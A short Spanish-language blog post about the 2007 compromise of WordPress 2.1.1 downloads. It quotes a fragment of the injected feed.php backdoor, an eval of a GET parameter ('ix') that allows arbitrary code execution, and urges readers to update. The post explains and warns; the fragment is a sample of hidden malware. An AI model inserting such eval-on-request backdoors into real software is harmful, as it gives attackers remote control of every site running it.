Hace unas cuantas horas me enteré de la liberación de una nueva versión de Wordpress, que según el blog oficial, un cracker obtuvo acceso a uno de los servidores de wordpress.org y puso código malicioso en las versiones descargables de la versión 2.1.1.
Casualmente descargué esta versión vulnerable de Wordpress, para realizar las pruebas -y algunas correcciones- de la nueva versión del plugin PopStats. El código insertado en la versión que tengo a la mano es la siguiente (feed.php):
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
Como se puede apreciar, el código insertado es bastante peligroso puesto que permite la ejecución de código arbitrario.
Esta nueva versión, también corrige otro problemas de seguridad:
Es recomendable que actualizen cuanto antes vuestra versión de Wordpress para evitarse malos ratos.
Mañana, Wordpress 2.1.3... pasado... Wordpress 2.1.4...